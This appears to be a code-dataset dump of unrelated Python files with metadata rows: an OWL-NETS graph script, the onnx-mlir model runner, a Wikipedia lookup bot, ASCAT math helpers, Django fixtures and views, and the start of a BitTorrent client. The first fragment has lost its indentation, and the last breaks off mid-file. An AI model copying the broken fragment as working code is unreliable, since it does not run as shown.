entity_metadata['relations'][str(obj)] = {'label': label, 'namespace': namespace}
logger.info('Add RDF:type and RDFS:subclassOf')
entity_metadata['relations']['http://www.w3.org/2000/01/rdf-schema#subClassOf'] =\
{'label': 'subClassOf', 'namespace': 'www.w3.org'}
entity_metadata['relations']['https://www.w3.org/1999/02/22-rdf-syntax-ns#type'] =\
{'label': 'type', 'namespace': 'www.w3.org'}
logger.info('Stats for original graph before running OWL-NETS')
pkt.utils.derives_graph_statistics(graph)
logger.info('Initialize owlnets class')
owlnets = pkt.OwlNets(graph=graph,
write_location=working_dir + os.sep,
filename=file_from_uri(uri),
kg_construct_approach=None,
owl_tools=args.owltools_dir + os.sep + 'owltools')
logger.info('Remove disjointness with Axioms')
owlnets.removes_disjoint_with_axioms()
logger.info('Remove triples used only to support semantics')
cleaned_graph = owlnets.removes_edges_with_owl_semantics()
filtered_triple_count = len(owlnets.owl_nets_dict['filtered_triples'])
logger.info('removed {} triples that were not biologically meaningful'.format(filtered_triple_count))
logger.info('Gather list of owl:class and owl:axiom entities')
owl_classes = list(pkt.utils.gets_ontology_classes(owlnets.graph))
owl_axioms: list = []
for x in tqdm(set(owlnets.graph.subjects(RDF.type, OWL.Axiom))):
src = set(owlnets.graph.objects(list(owlnets.graph.objects(x, OWL.annotatedSource))[0], RDF.type))
tgt = set(owlnets.graph.objects(list(owlnets.graph.objects(x, OWL.annotatedTarget))[0], RDF.type))
if OWL.Class in src and OWL.Class in tgt:
owl_axioms += [x]
elif (OWL.Class in src and len(tgt) == 0) or (OWL.Class in tgt and len(src) == 0):
owl_axioms += [x]
else:
pass
node_list = list(set(owl_classes) | set(owl_axioms))
logger.info('There are:\n-{} OWL:Class objects\n-{} OWL:Axiom Objects'. format(len(owl_classes), len(owl_axioms)))
logger.info('Decode owl semantics')
owlnets.cleans_owl_encoded_entities(node_list)
decoded_graph: Dict = owlnets.gets_owlnets_graph()
logger.info('Update graph to get all cleaned edges')
owlnets.graph = cleaned_graph + decoded_graph
logger.info('Owlnets results')
str1 = 'Decoded {} owl-encoded classes and axioms. Note the following:\nPartially processed {} cardinality ' \
'elements\nRemoved {} owl:disjointWith axioms\nIgnored:\n -{} misc classes;\n -{} classes constructed with ' \
'owl:complementOf;\n -{} classes containing negation (e.g. pr#lacks_part, cl#has_not_completed)\n' \
'Filtering removed {} semantic support triples'
stats_str = str1.format(
len(owlnets.owl_nets_dict['decoded_entities'].keys()), len(owlnets.owl_nets_dict['cardinality'].keys()),
len(owlnets.owl_nets_dict['disjointWith']), len(owlnets.owl_nets_dict['misc'].keys()),
len(owlnets.owl_nets_dict['complementOf'].keys()), len(owlnets.owl_nets_dict['negation'].keys()),
len(owlnets.owl_nets_dict['filtered_triples']))
logger.info('=' * 80 + '\n' + stats_str + '\n' + '=' * 80)
# common_ancestor = 'http://purl.obolibrary.org/obo/BFO_0000001'
# owlnets.graph = owlnets.makes_graph_connected(owlnets.graph, common_ancestor)
logger.info(f"Writing owl-nets results files to directory '{working_dir}'")
owlnets.write_location = working_dir
owlnets.write_out_results(owlnets.graph)
edge_list_filename: str = working_dir + os.sep + 'OWLNETS_edgelist.txt'
logger.info(f"Write edge list results to '{edge_list_filename}'")
with open(edge_list_filename, 'w') as out:
out.write('subject' + '\t' + 'predicate' + '\t' + 'object' + '\n')
for row in tqdm(owlnets.graph):
out.write(str(row[0]) + '\t' + str(row[1]) + '\t' + str(row[2]) + '\n')
logger.info('Get all unique nodes in OWL-NETS graph')
nodes = set([x for y in [[str(x[0]), str(x[2])] for x in owlnets.graph] for x in y])
node_metadata_filename: str = working_dir + os.sep + 'OWLNETS_node_metadata.txt'
logger.info(f"Write node metadata results to '{node_metadata_filename}'")
with open(node_metadata_filename, 'w') as out:
out.write('node_id' + '\t' + 'node_namespace' + '\t' + 'node_label' + '\t' + 'node_synonyms' + '\t' + 'node_dbxrefs' + '\n')
for x in tqdm(nodes):
if x in entity_metadata['nodes'].keys():
namespace = entity_metadata['nodes'][x]['namespace']
labels = entity_metadata['nodes'][x]['label']
synonyms = entity_metadata['nodes'][x]['synonyms']
dbxrefs = entity_metadata['nodes'][x]['dbxrefs']
out.write(x + '\t' + namespace + '\t' + labels + '\t' + synonyms + '\t' + dbxrefs + '\n')
logger.info('Get all unique nodes in OWL-NETS graph')
relations = set([str(x[1]) for x in owlnets.graph])
relation_filename: str = working_dir + os.sep + 'OWLNETS_relations.txt'
logger.info(f"Writing relation metadata results to '{relation_filename}'")
with open(relation_filename, 'w') as out:
out.write('relation_id' + '\t' + 'relation_namespace' + '\t' + 'relation_label' + '\n')
for x in tqdm(relations):
if x in entity_metadata['relations']:
if 'namespace' in entity_metadata['relations'][x]:
namespace = entity_metadata['relations'][x]['namespace']
if 'label' in entity_metadata['relations'][x]:
label = entity_metadata['relations'][x]['label']
out.write(x + '\t' + namespace + '\t' + label + '\n')
else:
logger.error(f"entity_metadata['relations'][{x}]['label'] not found in: {entity_metadata['relations'][x]}")
else:
logger.error(f"entity_metadata['relations'][{x}]['namespace'] not found in: {entity_metadata['relations'][x]}")
else:
logger.error(f"entity_metadata['relations'][{x}] not found in: {entity_metadata['relations']}")
log_files_and_sizes(working_dir)
# Add log entry for how long it took to do the processing...
elapsed_time = time.time() - start_time
logger.info('Done! Elapsed time %s', "{:0>8}".format(str(timedelta(seconds=elapsed_time))))
| 41.076233 | 128 | 0.667959 | 133 | 0.00726 | 0 | 0 | 0 | 0 | 0 | 0 | 7,169 | 0.391321 |
a4d78de1db41ad21fc14b47b7c3883106da48d50 | 11,513 | py | Python | utils/RunONNXModel.py | kwu91/onnx-mlir | 0b77ee750de015a2a3212556092ce535bc5d831a | [
"Apache-2.0"
] | 1 | 2021-10-01T02:46:03.000Z | 2021-10-01T02:46:03.000Z | utils/RunONNXModel.py | lipracer/onnx-mlir | ecacba10912457d91cfe66799ae2d4408ed85af7 | [
"Apache-2.0"
] | null | null | null | utils/RunONNXModel.py | lipracer/onnx-mlir | ecacba10912457d91cfe66799ae2d4408ed85af7 | [
"Apache-2.0"
] | null | null | null | import os
import sys
import argparse
import onnx
import time
import subprocess
import numpy as np
import tempfile
from onnx import numpy_helper
from collections import OrderedDict
# Command arguments.
parser = argparse.ArgumentParser()
parser.add_argument('model_path', type=str, help="Path to the ONNX model.")
parser.add_argument('--print_input',
action='store_true',
help="Print out inputs")
parser.add_argument('--print_output',
action='store_true',
help="Print out outputs")
parser.add_argument('--compile_args',
type=str,
default="",
help="Arguments passed directly to onnx-mlir command."
" See bin/onnx-mlir --help")
parser.add_argument(
'--shape_info',
type=str,
help="Shape for each dynamic input, e.g. 0:1x10x20,1:7x5x3")
parser.add_argument('--verify',
choices=['onnxruntime', 'ref'],
help="Verify the output by using onnxruntime or reference"
" inputs/outputs. By default, no verification")
parser.add_argument(
'--ref_folder',
type=str,
help="Path to the folder containing reference inputs and outputs stored"
" in protobuf. Used when --verify=ref")
parser.add_argument('--rtol',
type=str,
default="0.05",
help="Relative tolerance for verification")
parser.add_argument('--atol',
type=str,
default="0.01",
help="Absolute tolerance for verification")
args = parser.parse_args()
if (not os.environ.get('ONNX_MLIR_HOME', None)):
raise RuntimeError(
"Environment variable ONNX_MLIR_HOME is not set, please set it to the path to "
"the HOME directory for onnx-mlir. The HOME directory for onnx-mlir refers to "
"the parent folder containing the bin, lib, etc sub-folders in which ONNX-MLIR "
"executables and libraries can be found.")
VERBOSE = os.environ.get('VERBOSE', False)
ONNX_MLIR_EXENAME = "onnx-mlir"
if sys.platform == "win32":
ONNX_MLIR_EXENAME = "onnx-mlir.exe"
ONNX_MLIR = os.path.join(os.environ['ONNX_MLIR_HOME'], "bin",
ONNX_MLIR_EXENAME)
# Include runtime directory in python paths, so PyRuntime can be imported.
RUNTIME_DIR = os.path.join(os.environ['ONNX_MLIR_HOME'], "lib")
sys.path.append(RUNTIME_DIR)
try:
from PyRuntime import ExecutionSession
except ImportError:
raise ImportError(
"Looks like you did not build the PyRuntime target, build it by running `make PyRuntime`."
)
def ordinal(n):
suffix = ['th', 'st', 'nd', 'rd', 'th'][min(n % 10, 4)]
if 11 <= (n % 100) <= 13:
suffix = 'th'
return str(n) + suffix
def execute_commands(cmds):
if (VERBOSE):
print(cmds)
subprocess.call(cmds, shell=True)
def extend_model_output(model, intermediate_outputs):
# onnx-mlir doesn't care about manually specified output types & shapes.
DUMMY_TENSOR_TYPE = onnx.TensorProto.FLOAT
while (len(model.graph.output)):
model.graph.output.pop()
for output_name in intermediate_outputs:
output_value_info = onnx.helper.make_tensor_value_info(
output_name, DUMMY_TENSOR_TYPE, None)
model.graph.output.extend([output_value_info])
return model
def read_input_from_refs(model, ref_folder):
print("Reading inputs from {} ...".format(ref_folder))
i = 0
inputs = []
input_names = []
initializers = list(map(lambda x: x.name, model.graph.initializer))
for input_proto in model.graph.input:
if input_proto.name not in initializers:
input_names.append(input_proto.name)
input_file = ref_folder + '/input_{}.pb'.format(i)
input_ts = onnx.TensorProto()
with open(input_file, 'rb') as f:
input_ts.ParseFromString(f.read())
inputs += [numpy_helper.to_array(input_ts)]
i += 1
print(" done.\n")
return (inputs, input_names)
def read_output_from_refs(model, ref_folder):
print("Reading reference outputs from {} ...".format(ref_folder))
reference_output = []
for i, _ in enumerate(model.graph.output):
output_file = ref_folder + '/output_{}.pb'.format(i)
output_ts = onnx.TensorProto()
with open(output_file, 'rb') as f:
output_ts.ParseFromString(f.read())
reference_output += [numpy_helper.to_array(output_ts)]
print(" done.\n")
return reference_output
def generate_random_input(model, input_shapes):
print("Generating random inputs ...")
# Generate random data as input.
inputs = []
input_names = []
initializers = list(map(lambda x: x.name, model.graph.initializer))
np.random.seed(42)
for i, input_proto in enumerate(model.graph.input):
if input_proto.name in initializers:
continue
input_names.append(input_proto.name)
shape_proto = input_proto.type.tensor_type.shape
explicit_shape = []
for d, dim in enumerate(shape_proto.dim):
if dim.dim_value:
explicit_shape.append(dim.dim_value)
continue
if i in input_shapes:
if d < len(input_shapes[i]):
explicit_shape.append(input_shapes[i][d])
else:
print("The {} dim".format(ordinal(d + 1)),
"of the {} input is unknown.".format(ordinal(i + 1)),
"Use --shape_info to set.")
print(shape_proto)
exit()
else:
print("The shape of the {} input".format(ordinal(i + 1)),
"is unknown. Use --shape_info to set.")
print(shape_proto)
exit()
inputs.append(
np.random.uniform(-1.0, 1.0, explicit_shape).astype(np.float32))
print(" done.\n")
return (inputs, input_names)
def main():
# Get shape information if given.
# args.shape_info in the form of 'input_index:d1xd2, input_index:d1xd2'
input_shapes = {}
if args.shape_info:
for input_shape in args.shape_info.strip().split(","):
input_index_shape = input_shape.split(":")
input_index = input_index_shape[0]
assert not (input_index in input_shapes), "Duplicate input indices"
dims = [int(d) for d in input_index_shape[1].split("x")]
input_shapes[int(input_index)] = dims
# Load the onnx model.
model = onnx.load(args.model_path)
# Get the output names that we want to verify.
# If using onnxruntime for verification, we can verify every operation output.
output_names = [o.name for o in model.graph.output]
output_names = list(OrderedDict.fromkeys(output_names))
if (args.verify and args.verify == "onnxruntime"):
output_names = sum([[n for n in node.output if n != '']
for node in model.graph.node], [])
output_names = list(OrderedDict.fromkeys(output_names))
model = extend_model_output(model, output_names)
# Compile, run, and verify.
with tempfile.TemporaryDirectory() as temp_dir:
print("Temporary directory has been created at {}".format(temp_dir))
print("Compiling the model ...")
# Save modified model & invoke onnx-mlir to compile it.
temp_model_path = os.path.join(temp_dir, "model.onnx")
onnx.save(model, temp_model_path)
command_str = ONNX_MLIR
if args.compile_args:
command_str += " " + args.compile_args
command_str += " " + temp_model_path
start = time.perf_counter()
execute_commands(command_str)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
# Prepare input data.
inputs = []
input_names = []
if (args.verify and args.verify.lower() == "ref"):
assert args.ref_folder, "No reference folder given"
inputs, input_names = read_input_from_refs(model, args.ref_folder)
else:
inputs, input_names = generate_random_input(model, input_shapes)
# Print the input if required.
if (args.print_input):
for i, inp in enumerate(inputs):
print("The {} input {}:{} is: \n {} \n".format(
ordinal(i + 1), input_names[i], list(inp.shape), inp))
print("Running inference ...")
temp_shared_lib_path = os.path.join(temp_dir, "model.so")
start = time.perf_counter()
# Use the generated shared library to create an execution session.
sess = ExecutionSession(temp_shared_lib_path, "run_main_graph")
outs = sess.run(inputs)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
# Print the output if required.
if (args.print_output):
for i, out in enumerate(outs):
print("The {} output {}:{} is: \n {} \n".format(
ordinal(i + 1), output_names[i], list(out.shape), out))
# Run the model with reference backend and get results.
if (args.verify):
ref_outs = []
if (args.verify.lower() == "onnxruntime"):
# Reference backend by using onnxruntime.
import onnxruntime
output_names = list(map(lambda x: x.name, model.graph.output))
input_feed = dict(zip(input_names, inputs))
print("Running inference using onnxruntime ...")
start = time.perf_counter()
ref_session = onnxruntime.InferenceSession(temp_model_path)
ref_outs = ref_session.run(output_names, input_feed)
end = time.perf_counter()
print(" took ", end - start, " seconds.\n")
elif (args.verify.lower() == "ref"):
ref_outs = read_output_from_refs(model, args.ref_folder)
else:
print("Invalid verify option")
exit()
# For each output tensor, compare results.
for i, name in enumerate(output_names):
print("Verifying value of {}:{}".format(name, list(outs[i].shape)),
"using atol={}, rtol={} ...".format(args.atol, args.rtol))
total_elements = 0
mismatched_elements = 0
for index, actual_val in np.ndenumerate(outs[i]):
total_elements += 1
ref_val = ref_outs[i][index]
# Use equation atol + rtol * abs(desired), that is used in assert_allclose.
diff = float(args.atol) + float(args.rtol) * abs(ref_val)
if (abs(actual_val - ref_val) <= diff):
continue
mismatched_elements += 1
print(" at {}".format(index),
"mismatch {} (actual)".format(actual_val),
"vs {} (reference)".format(ref_val))
if mismatched_elements == 0:
print(" correct.\n".format(
args.atol, args.rtol))
else:
print(" mismatched elements {}/{}.\n".format(
mismatched_elements, total_elements))
if __name__ == '__main__':
main()
| 39.428082 | 98 | 0.588118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,914 | 0.253105 |
a4d7f579f4f81770778c2fff64640120abcdce53 | 262 | py | Python | test/run/t242.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/run/t242.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/run/t242.py | csev/skulpt | 9aa25b7dbf29f23ee8d3140d01a6f4353d12e66f | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | class O(object): pass
class A(O): pass
class B(O): pass
class C(O): pass
class D(O): pass
class E(O): pass
class K1(A,B,C): pass
class K2(D,B,E): pass
class K3(D,A): pass
class Z(K1,K2,K3): pass
print K1.__mro__
print K2.__mro__
print K3.__mro__
print Z.__mro__
| 17.466667 | 23 | 0.698473 | 185 | 0.706107 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
a4d8df51b3654641073f7de35aaf60a1014ee347 | 3,154 | py | Python | bot/assets/wiki/wiki.py | AdvaithGS/Astrobot | 6b63f8cd015a24d8211dcbac496bf9f5dd6275d4 | [
"MIT"
] | 2 | 2021-12-04T14:27:04.000Z | 2021-12-22T08:52:41.000Z | bot/assets/wiki/wiki.py | AdvaithGS/Astrobot | 6b63f8cd015a24d8211dcbac496bf9f5dd6275d4 | [
"MIT"
] | null | null | null | bot/assets/wiki/wiki.py | AdvaithGS/Astrobot | 6b63f8cd015a24d8211dcbac496bf9f5dd6275d4 | [
"MIT"
] | null | null | null | import requests
from json import loads
from bs4 import BeautifulSoup
from os import environ
l = ['atom','moon','star','space','astro','cluster','galaxy','sky','planet','solar','science','physic','scientist','cosmos']
def clean(text):
while '[' in text:
text = text.replace(text[text.find('['):text.find(']',text.find('['))+1],'')
return text
def get_wiki(search_query):
if len(search_query.split()) == 1:
search_query = search_query.capitalize()
not_space = False
try:
headers = {
'Authorization': environ['api_key5'],
'User-Agent': 'Advaith'
}
page = f'https://en.wikipedia.org/w/rest.php/v1/page/{search_query}/html'
req = requests.get(page).text
soup = BeautifulSoup(req,'lxml')
d = {}
try:
if 'refer' in soup.find_all('p')[1].text:
x = d['13']
text = soup.find_all('p')[0].text
i = 1
while len(text) < 100:
text = soup.find_all('p')[i].text
i += 1
if any([z in text.lower() for z in l]):
text = clean(text)
correct = True
else:
not_space = True
correct = False
except:
for i in soup.find_all('a'):
if any([z in i.text.lower() for z in l]):
try:
search_query = i['href'][1:]
page = 'https://en.wikipedia.org/w/rest.php/v1/page' + i['href'] [1:] + '/html'
req = requests.get(page).text
soup = BeautifulSoup(req,'lxml')
i = 1
text = soup.find_all('p')[0].text
while len(text) < 100:
text = soup.find_all('p')[i].text
i += 1
text = clean(text)
correct = True
break
except:
continue
else:
correct = False
if correct:
url = 'https://api.wikimedia.org/core/v1/wikipedia/en/search/page'
parameters = {'q': search_query, 'limit': 1}
response = loads(requests.get(url, headers=headers, params=parameters).text)
image = 'https:' + response['pages'][0]['thumbnail']['url'].replace('200px','500px')
try:
desc = clean(soup.find('div', attrs = {'class':'infobox-caption'}).text)
except:
try:
desc = clean(soup.find('figcaption').text)
except:
desc = search_query
else:
image = None
except Exception as e:
print(e)
try:
return text,image,desc
except:
if not_space:
return None,None,'is not a space query'
else:
return None,None,'could not be resolved'
# return None,None,'Not found'
#return get_wiki(search_query + ' (moon)')
| 33.553191 | 124 | 0.460051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 612 | 0.194039 |
a4d9167372fd4f933a82a1fee41baeab560eb279 | 1,012 | py | Python | bfassist/standalone/monitoring/realtimecheckpoint.py | SanHime/bfassist | f4870189a54373487064897ad0d5bf46ae9d97f8 | [
"Apache-2.0"
] | 1 | 2021-07-09T14:40:14.000Z | 2021-07-09T14:40:14.000Z | bfassist/standalone/monitoring/realtimecheckpoint.py | SanHime/bfassist | f4870189a54373487064897ad0d5bf46ae9d97f8 | [
"Apache-2.0"
] | null | null | null | bfassist/standalone/monitoring/realtimecheckpoint.py | SanHime/bfassist | f4870189a54373487064897ad0d5bf46ae9d97f8 | [
"Apache-2.0"
] | null | null | null | #############################################################################
#
#
# Module of BFA that manages server statistics in realtime
#
#
#############################################################################
""" This module implements the real-time logging of in-game statistics specifically for one current bf checkpoint.
Dependencies:
None
note:: Author(s): Mitch last-check: 08.07.2021 """
# noinspection PyUnusedLocal
def __preload__(forClient: bool = True):
pass
# noinspection PyUnusedLocal
def __postload__(forClient: bool = True):
pass
class RealTimeCP:
""" A control point that exists on a map can have a corresponding real time control point to track it.
:param Id: Refractor id of this control point.
:param team: Team the control point is currently controlled by.
note:: Author(s): Mitch, henk """
def __init__(self, Id: int = None, team: int = None):
self.Id = Id
self.team = team
| 26.631579 | 114 | 0.560277 | 414 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 767 | 0.757905 |
a4d968f989a285cf96c27baed01da6b65175ba59 | 615 | py | Python | core/views.py | koshasrepus/app_my_place | 8be9e9062247c177375162b943fb842752807553 | [
"Unlicense"
] | null | null | null | core/views.py | koshasrepus/app_my_place | 8be9e9062247c177375162b943fb842752807553 | [
"Unlicense"
] | null | null | null | core/views.py | koshasrepus/app_my_place | 8be9e9062247c177375162b943fb842752807553 | [
"Unlicense"
] | null | null | null | from django.shortcuts import render
from django.http import JsonResponse
from django.views import View
from core.handlers.dispatcher import process_telegram_event
from app_my_places.settings import TELEGRAM_TOKEN
import json
# Create your views here.
def index(request):
return JsonResponse({"error": "forbidden"})
class TelegramBotWebhookView(View):
def post(self, request, *args, **kwargs):
process_telegram_event(json.loads(request.body))
return JsonResponse({"post": "work!"})
def get(self, request, *args, **kwargs):
return JsonResponse({"ok": "Get response work!"})
| 26.73913 | 59 | 0.734959 | 290 | 0.471545 | 0 | 0 | 0 | 0 | 0 | 0 | 80 | 0.130081 |
a4d975ef883007f74d9af2353db4314fdedd350c | 157 | py | Python | tests/cases/infer.py | div72/py2many | 60277bc13597bd32d078b88a7390715568115fc6 | [
"MIT"
] | 345 | 2021-01-28T17:33:08.000Z | 2022-03-25T16:07:56.000Z | tests/cases/infer.py | mkos11/py2many | be6cfaad5af32c43eb24f182cb20ad63b979d4ef | [
"MIT"
] | 291 | 2021-01-31T13:15:06.000Z | 2022-03-23T21:28:49.000Z | tests/cases/infer.py | mkos11/py2many | be6cfaad5af32c43eb24f182cb20ad63b979d4ef | [
"MIT"
] | 23 | 2021-02-09T17:15:03.000Z | 2022-02-03T05:57:44.000Z | #!/usr/bin/env python3
def foo():
a = 10
# infer that b is an int
b = a
assert b == 10
print(b)
if __name__ == "__main__":
foo()
| 11.214286 | 28 | 0.509554 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 56 | 0.356688 |
a4d9e356367e346a01ca362683e21a1ac2b3a8aa | 4,852 | py | Python | src/ascat/math.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | src/ascat/math.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | src/ascat/math.py | lweydemann/ascat | 9c986ba40694a13356c44f403c66d73ccaab83bf | [
"MIT"
] | null | null | null | # Copyright (c) 2020, TU Wien, Department of Geodesy and Geoinformation
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of TU Wien, Department of Geodesy and Geoinformation
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL TU WIEN DEPARTMENT OF GEODESY AND
# GEOINFORMATION BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import numpy as np
def db2lin(val):
"""
Converting from linear to dB domain.
Parameters
----------
val : numpy.ndarray
Values in dB domain.
Returns
-------
val : numpy.ndarray
Values in linear domain.
"""
return 10 ** (val / 10.)
def lin2db(val):
"""
Converting from linear to dB domain.
Parameters
----------
val : numpy.ndarray
Values in linear domain.
Returns
-------
val : numpy.ndarray
Values in dB domain.
"""
return 10. * np.log10(val)
def get_window_radius(window, hp_radius):
"""
Calculates the required radius of a window function in order to achieve
the provided half power radius.
Parameters
----------
window : string
Window function name.
Current supported windows:
- Hamming
- Boxcar
hp_radius : float32
Half power radius. Radius of window function for weight
equal to 0.5 (-3 dB). In the spatial domain this corresponds to
half of the spatial resolution one would like to achieve with the
given window.
Returns
-------
r : float32
Window radius needed to achieve the given half power radius
"""
window = window.lower()
hp_weight = 0.5
if window == 'hamming':
alpha = 0.54
r = (np.pi * hp_radius) / np.arccos((hp_weight-alpha) / (1-alpha))
elif window == 'boxcar':
r = hp_radius
else:
raise ValueError('Window name not supported.')
return r
def hamming_window(radius, distances):
"""
Hamming window filter.
Parameters
----------
radius : float32
Radius of the window.
distances : numpy.ndarray
Array with distances.
Returns
-------
weights : numpy.ndarray
Distance weights.
tw : float32
Sum of weigths.
"""
alpha = 0.54
weights = alpha + (1 - alpha) * np.cos(np.pi / radius * distances)
return weights, np.sum(weights)
def boxcar(radius, distance):
"""
Boxcar filter
Parameters
----------
n : int
Length.
Returns
-------
weights : numpy.ndarray
Distance weights.
tw : float32
Sum of weigths.
"""
weights = np.zeros(distance.size)
weights[distance <= radius] = 1.
return weights, np.sum(weights)
def get_window_weights(window, radius, distance, norm=False):
"""
Function returning weights for the provided window function
Parameters
----------
window : str
Window function name
radius : float
Radius of the window.
distance : numpy.ndarray
Distance array
norm : boolean
If true, normalised weights will be returned.
Returns
-------
weights : numpy.ndarray
Weights according to distances and given window function
"""
if window == 'hamming':
weights, w_sum = hamming_window(radius, distance)
elif window == 'boxcar':
weights, w_sum = boxcar(radius, distance)
else:
raise ValueError('Window name not supported.')
if norm is True:
weights = weights / w_sum
return weights
| 27.106145 | 77 | 0.647362 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,742 | 0.771228 |
a4dade425c95d9b111ad44e99a5db732bfa49c43 | 1,592 | py | Python | project/tests/fixtures/fixture_data.py | hlystovea/resource_planner | 5ddbef31004a7e50201e1d414152a8090d1b0caf | [
"MIT"
] | null | null | null | project/tests/fixtures/fixture_data.py | hlystovea/resource_planner | 5ddbef31004a7e50201e1d414152a8090d1b0caf | [
"MIT"
] | null | null | null | project/tests/fixtures/fixture_data.py | hlystovea/resource_planner | 5ddbef31004a7e50201e1d414152a8090d1b0caf | [
"MIT"
] | null | null | null | import pytest
import tempfile
@pytest.fixture
def post(user):
from posts.models import Post
image = tempfile.NamedTemporaryFile(suffix=".jpg").name
return Post.objects.create(text='Тестовый пост 1', author=user, image=image)
@pytest.fixture
def group():
from posts.models import Group
return Group.objects.create(title='Тестовая группа 1', slug='test-link', description='Тестовое описание группы')
@pytest.fixture
def post_with_group(user, group):
from posts.models import Post
image = tempfile.NamedTemporaryFile(suffix=".jpg").name
return Post.objects.create(text='Тестовый пост 2', author=user, group=group, image=image)
@pytest.fixture
def storage_1():
from warehouse.models import Storage
return Storage.objects.create(name='storage_1')
@pytest.fixture
def storage_2():
from warehouse.models import Storage
return Storage.objects.create(name='storage_2')
@pytest.fixture
def material():
from warehouse.models import Material
return Material.objects.create(name='material')
@pytest.fixture
def instrument():
from warehouse.models import Instrument
return Instrument.objects.create(name='instrument')
@pytest.fixture
def material_in_storage_1(material, storage_1):
from warehouse.models import MaterialStorage
return MaterialStorage.objects.create(material=material, storage=storage_1, amount=2)
@pytest.fixture
def material_in_storage_2(material, storage_2):
from warehouse.models import MaterialStorage
return MaterialStorage.objects.create(material=material, storage=storage_2, amount=4)
| 26.983051 | 116 | 0.766332 | 0 | 0 | 0 | 0 | 1,595 | 0.965496 | 0 | 0 | 206 | 0.124697 |
a4db11ef5ed5b0211872ce11e6f5933e8efb3885 | 85 | py | Python | orm_skills/views.py | bluebamus/django_miscellaneous_book | 22e0851b3a07aeef94bb723b334f036ed5c17f72 | [
"MIT"
] | null | null | null | orm_skills/views.py | bluebamus/django_miscellaneous_book | 22e0851b3a07aeef94bb723b334f036ed5c17f72 | [
"MIT"
] | null | null | null | orm_skills/views.py | bluebamus/django_miscellaneous_book | 22e0851b3a07aeef94bb723b334f036ed5c17f72 | [
"MIT"
] | null | null | null | from django.shortcuts import render
# Create your views here.
def index():
pass
| 14.166667 | 35 | 0.729412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 25 | 0.294118 |
a4dc9a387c6801eebbce5ef0b1a99718dbb8697f | 17,584 | py | Python | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 12 | 2015-10-20T10:22:01.000Z | 2021-07-19T10:09:44.000Z | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 2 | 2015-10-20T10:22:55.000Z | 2017-02-13T11:05:25.000Z | Sketches/RJL/bittorrent/BitTorrent/bittorrent-curses.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 6 | 2015-03-09T12:51:59.000Z | 2020-03-01T13:06:21.000Z | #!/usr/bin/env python
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Original version written by Henry 'Pi' James, modified by (at least)
# John Hoffman and Uoti Urpala
from __future__ import division
from BitTorrent.platform import install_translation
install_translation()
SPEW_SCROLL_RATE = 1
import sys
import os
import threading
from time import time, strftime
from BitTorrent.download import Feedback, Multitorrent
from BitTorrent.defaultargs import get_defaults
from BitTorrent.parseargs import printHelp
from BitTorrent.zurllib import urlopen
from BitTorrent.bencode import bdecode
from BitTorrent.ConvertedMetainfo import ConvertedMetainfo
from BitTorrent.prefs import Preferences
from BitTorrent.obsoletepythonsupport import import_curses
from BitTorrent import configfile
from BitTorrent import BTFailure
from BitTorrent import version
from BitTorrent import GetTorrent
try:
curses = import_curses()
import curses.panel
from curses.wrapper import wrapper as curses_wrapper
from signal import signal, SIGWINCH
except:
print _("Textmode GUI initialization failed, cannot proceed.")
print
print _("This download interface requires the standard Python module "
"\"curses\", which is unfortunately not available for the native "
